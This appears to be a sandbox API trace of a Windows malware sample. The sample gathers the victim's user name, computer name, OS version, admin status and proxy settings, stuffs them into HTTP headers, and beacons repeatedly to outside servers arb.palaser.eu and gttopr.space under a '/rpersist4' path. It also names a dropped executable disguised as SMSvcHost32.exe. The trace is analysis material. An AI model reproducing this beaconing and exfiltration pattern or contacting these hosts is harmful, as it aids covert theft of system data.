	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.104] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.105] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetLastError () returned 0x0
	[0123.106] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x205f1a8, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0123.106] wsprintfW (in: param_1=0x396d0f0, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0123.106] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0123.106] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0123.106] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0123.106] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0123.106] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0123.106] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0123.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c8 | out: phkResult=0x205f2c8*=0x424) returned 0x0
	[0123.107] RegQueryValueExW (in: hKey=0x424, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0) returned 0x2
	[0123.107] RegCloseKey (hKey=0x424) returned 0x0
	[0123.107] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0123.107] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc | out: lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc) returned 1
	[0123.107] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, dwBufferLength=0x4) returned 1
	[0123.107] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0
	[0123.151] GetLastError () returned 0x2ee7
	[0123.152] GetModuleHandleA (lpModuleName="wininet.dll") returned 0x702b0000
	[0123.152] FormatMessageA (in: dwFlags=0x1b00, lpSource=0x702b0000, dwMessageId=0x2ee7, dwLanguageId=0x0, lpBuffer=0x205f8d8, nSize=0x0, Arguments=0x0 | out: lpBuffer="XÐ\x96\x03") returned 0x32
	[0123.152] LocalFree (hMem=0x396d058) returned 0x0
	[0123.152] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0123.152] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0123.152] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0123.152] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0123.152] InternetConnectA (hInternet=0xcc0004, lpszServerName="arb.palaser.eu", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0123.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205fe8c, cbMultiByte=-1, lpWideCharStr=0x73c090, cchWideChar=22 | out: lpWideCharStr="/rpersist4/1197631235") returned 22
	[0123.153] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rpersist4/1197631235", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0123.153] wsprintfW (in: param_1=0x396d0f0, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0123.153] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0123.153] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0123.153] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x689a08, nSize=0x205f2bc | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x205f2bc) returned 0x1
	[0123.153] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0123.153] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0123.153] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c4 | out: phkResult=0x205f2c4*=0x424) returned 0x0
	[0123.154] RegQueryValueExW (in: hKey=0x424, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.154] RegQueryValueExW (in: hKey=0x424, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.154] RegQueryValueExW (in: hKey=0x424, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.154] RegCloseKey (hKey=0x424) returned 0x0
	[0123.154] wsprintfW (in: param_1=0x396d0f0, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0123.154] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0123.154] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0123.154] GetVersionExW (in: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0123.154] wsprintfW (in: param_1=0x396d0f0, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0123.154] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0123.154] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0123.154] wsprintfW (in: param_1=0x396d0f0, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0123.155] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0123.155] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0123.156] CloseHandle (hObject=0x424) returned 1
	[0123.156] CloseHandle (hObject=0xffffffff) returned 1
	[0123.156] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x205f2c4 | out: bufptr=0x39ac900*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x186772d, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x39ac997, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0123.159] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0123.159] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0123.159] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0123.159] NetApiBufferFree (Buffer=0x39ac900) returned 0x0
	[0123.159] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x205f1a8, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0123.160] wsprintfW (in: param_1=0x396d0f0, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0123.160] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0123.160] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0123.160] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0123.160] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0123.160] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0123.160] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0123.160] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c8 | out: phkResult=0x205f2c8*=0x6a0) returned 0x0
	[0123.160] RegQueryValueExW (in: hKey=0x6a0, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0) returned 0x2
	[0123.160] RegCloseKey (hKey=0x6a0) returned 0x0
	[0123.160] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0123.160] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc | out: lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc) returned 1
	[0123.160] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, dwBufferLength=0x4) returned 1
	[0123.161] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0
	[0123.177] GetLastError () returned 0x2ee7
	[0123.178] GetModuleHandleA (lpModuleName="wininet.dll") returned 0x702b0000
	[0123.178] FormatMessageA (in: dwFlags=0x1b00, lpSource=0x702b0000, dwMessageId=0x2ee7, dwLanguageId=0x0, lpBuffer=0x205f8d8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x18Ê\x96\x03") returned 0x32
	[0123.178] LocalFree (hMem=0x396ca18) returned 0x0
	[0123.178] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0123.178] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0123.178] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0123.178] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0123.178] InternetConnectA (hInternet=0xcc0004, lpszServerName="arb.palaser.eu", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0123.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205fe8c, cbMultiByte=-1, lpWideCharStr=0x73c2c0, cchWideChar=22 | out: lpWideCharStr="/rpersist4/1197631235") returned 22
	[0123.178] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rpersist4/1197631235", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0123.179] wsprintfW (in: param_1=0x396d0f0, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0123.179] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0123.179] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0123.179] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x689a08, nSize=0x205f2bc | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x205f2bc) returned 0x1
	[0123.179] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0123.179] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0123.179] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c4 | out: phkResult=0x205f2c4*=0x6a0) returned 0x0
	[0123.179] RegQueryValueExW (in: hKey=0x6a0, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.179] RegQueryValueExW (in: hKey=0x6a0, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.179] RegQueryValueExW (in: hKey=0x6a0, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.179] RegCloseKey (hKey=0x6a0) returned 0x0
	[0123.180] wsprintfW (in: param_1=0x396d0f0, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0123.180] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0123.180] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0123.180] GetVersionExW (in: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0123.180] wsprintfW (in: param_1=0x396d0f0, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0123.180] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0123.180] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0123.180] wsprintfW (in: param_1=0x396d0f0, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0123.180] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0123.180] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0123.181] CloseHandle (hObject=0x6a0) returned 1
	[0123.181] CloseHandle (hObject=0xffffffff) returned 1
	[0123.182] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x205f2c4 | out: bufptr=0x39ab280*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x186772d, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x39ab317, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0123.185] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0123.185] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0123.185] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0123.185] NetApiBufferFree (Buffer=0x39ab280) returned 0x0
	[0123.185] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x205f1a8, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0123.185] wsprintfW (in: param_1=0x396d0f0, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0123.185] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0123.185] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0123.185] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0123.185] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0123.185] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0123.185] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0123.185] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c8 | out: phkResult=0x205f2c8*=0x69c) returned 0x0
	[0123.185] RegQueryValueExW (in: hKey=0x69c, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0) returned 0x2
	[0123.186] RegCloseKey (hKey=0x69c) returned 0x0
	[0123.186] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0123.186] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc | out: lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc) returned 1
	[0123.186] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, dwBufferLength=0x4) returned 1
	[0123.186] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0
	[0123.226] GetLastError () returned 0x2ee7
	[0123.226] GetModuleHandleA (lpModuleName="wininet.dll") returned 0x702b0000
	[0123.227] FormatMessageA (in: dwFlags=0x1b00, lpSource=0x702b0000, dwMessageId=0x2ee7, dwLanguageId=0x0, lpBuffer=0x205f8d8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x98\xcd\x96\x03") returned 0x32
	[0123.227] LocalFree (hMem=0x396cd98) returned 0x0
	[0123.227] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0123.227] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0123.227] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0123.227] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0123.227] InternetConnectA (hInternet=0xcc0004, lpszServerName="gttopr.space", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0123.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205fe8c, cbMultiByte=-1, lpWideCharStr=0x73bfb0, cchWideChar=22 | out: lpWideCharStr="/rpersist4/1197631235") returned 22
	[0123.227] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rpersist4/1197631235", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0123.228] wsprintfW (in: param_1=0x396d0f0, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0123.228] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0123.228] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0123.228] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x68a4d0, nSize=0x205f2bc | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x205f2bc) returned 0x1
	[0123.228] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0123.228] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0123.228] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c4 | out: phkResult=0x205f2c4*=0x69c) returned 0x0
	[0123.228] RegQueryValueExW (in: hKey=0x69c, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.228] RegQueryValueExW (in: hKey=0x69c, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.228] RegQueryValueExW (in: hKey=0x69c, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0123.228] RegCloseKey (hKey=0x69c) returned 0x0
